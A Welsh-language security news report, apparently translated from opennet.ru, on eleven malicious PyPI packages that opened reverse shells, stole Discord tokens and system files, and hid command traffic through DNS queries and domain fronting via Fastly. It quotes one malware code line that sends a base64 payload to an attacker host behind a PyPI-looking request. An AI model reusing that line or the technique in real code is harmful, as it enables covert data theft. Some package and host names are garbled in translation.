Yn y cyfeiriadur PyPI (Python Package Index), nodwyd 11 pecyn yn cynnwys cod maleisus. Cyn i broblemau gael eu nodi, roedd y pecynnau wedi'u llwytho i lawr tua 38 mil o weithiau i gyd. Mae'r pecynnau maleisus a ganfuwyd yn nodedig am eu defnydd o ddulliau soffistigedig i guddio sianeli cyfathrebu â gweinyddwyr yr ymosodwyr.
- importantpackage (6305 lawrlwythiadau), important-package (12897) - sefydlu cysylltiad â gweinydd allanol dan y gochl cysylltu â pypi.python.org i ddarparu mynediad cragen i'r system (cragen cefn) a defnyddio'r rhaglen trevorc2 i guddio'r sianel gyfathrebu.
- pptest (10001), ipboards (946) - defnyddio DNS fel sianel gyfathrebu i drosglwyddo gwybodaeth am y system (yn y pecyn cyntaf yr enw gwesteiwr, cyfeiriadur gweithio, IP mewnol ac allanol, yn yr ail - enw defnyddiwr ac enw gwesteiwr) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - nodi'r tocyn gwasanaeth Discord yn y system a'i anfon at westeiwr allanol.
- trrfab (287) - anfonwyd y dynodwr, enw gwesteiwr a chynnwys /etc/passwd, /etc/hosts, /home i'r gwesteiwr allanol.
- 10Cent10 (490) - sefydlu cysylltiad cragen wrthdro gyda gwesteiwr allanol.
- yandex-yt (4183) - wedi arddangos neges am y system yn cael ei pheryglu a'i hailgyfeirio i dudalen gyda gwybodaeth ychwanegol am gamau gweithredu pellach a gyhoeddwyd trwy nda.ya.ru (api.ya.cc).
O bwys arbennig yw'r dull o gyrchu gwesteiwyr allanol a ddefnyddir yn y pecyn pwysig a'r pecynnau pecyn pwysig, a ddefnyddiodd y rhwydwaith darparu cynnwys Fastly a ddefnyddir yn y cyfeiriadur PyPI i guddio eu gweithgaredd. Mewn gwirionedd, anfonwyd ceisiadau at y gweinydd pypi.python.org (gan gynnwys nodi'r enw python.org yn SNI y tu mewn i'r cais HTTPS), ond roedd pennawd HTTP “Host” yn cynnwys enw'r gweinydd a reolir gan yr ymosodwyr (sec. ymlaen.io. global.prod.fastly.net). Anfonodd y rhwydwaith darparu cynnwys gais tebyg at y gweinydd ymosod, gan ddefnyddio paramedrau'r cysylltiad TLS â pypi.python.org wrth drosglwyddo data.
Mae seilwaith PyPI yn cael ei bweru gan y rhwydwaith cyflwyno cynnwys Fastly, sy'n defnyddio dirprwy Varnish tryloyw i storio ceisiadau cyffredin yn y storfa amser ac yn trin tystysgrifau TLS ar lefel CDN, yn hytrach nag ar y gweinyddion pwynt terfyn, i lwybro ceisiadau HTTPS trwy'r dirprwy. Waeth beth fo'r gwesteiwr targed, caiff ceisiadau eu llwybro i'r dirprwy, sy'n pennu'r gwesteiwr a ddymunir gan ddefnyddio'r pennawd HTTP "Gwesteiwr". enwau parth mae gwesteiwyr wedi'u mapio i gyfeiriadau IP cydbwysydd llwyth CDN sy'n gyffredin i bob cwsmer Fastly.
Mae gweinydd yr ymosodwr hefyd yn cofrestru gyda'r Fastly CDN, sy'n cynnig cynlluniau am ddim i unrhyw un a hyd yn oed yn caniatáu cofrestru dienw. Yn arbennig, defnyddir y gragen gwrthdro hefyd i anfon ceisiadau at y dioddefwr, ond wedi'u cychwyn gan westeiwr yr ymosodwr. O'r tu allan, mae'n ymddangos bod rhyngweithiadau â gweinydd yr ymosodwr yn sesiynau cyfreithlon gyda'r cyfeiriadur PyPI, wedi'u hamgryptio gan ddefnyddio Tystysgrif TLS PyPI. Defnyddiwyd techneg debyg, a elwir yn "flaenu parth," yn helaeth yn flaenorol i guddio enwau gwesteiwyr wrth osgoi blocio. Mae'r dechneg hon yn defnyddio'r nodwedd mynediad HTTPS a gynigir gan rai CDNs, gan nodi enw gwesteiwr ffug yn yr SNI a throsglwyddo'r enw gwesteiwr gofynnol mewn gwirionedd ym mhennawd Gwesteiwr HTTP o fewn y sesiwn TLS.
I guddio gweithgaredd maleisus, defnyddiwyd pecyn TrevorC2 hefyd i wneud rhyngweithio â'r gweinydd yn debyg i lywio gwe arferol, er enghraifft, anfonwyd ceisiadau maleisus dan y gochl o lawrlwytho'r ddelwedd “https://pypi.python.org/images/ guid =” gydag amgodio gwybodaeth ym mharamedr y canllaw. url = " https://pypi.python.org " + "/images" + "?" +"guid=" +b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Defnyddiodd y pecynnau pptest ac ipboards ddull gwahanol i guddio gweithgaredd rhwydwaith, yn seiliedig ar amgodio gwybodaeth ddefnyddiol mewn ymholiadau i'r gweinydd DNS. Mae'r malware yn trosglwyddo gwybodaeth trwy berfformio ceisiadau DNS fel “nu4timjagq4fimbuhe.example.com”, lle mae'r data a drosglwyddir i'r gweinydd rheoli yn cael ei amgodio gan ddefnyddio'r fformat base64 yn enw'r is-barth. Mae'r ymosodwr yn derbyn y negeseuon hyn trwy reoli'r gweinydd DNS ar gyfer y parth example.com.
Ffynhonnell: opennet.ru
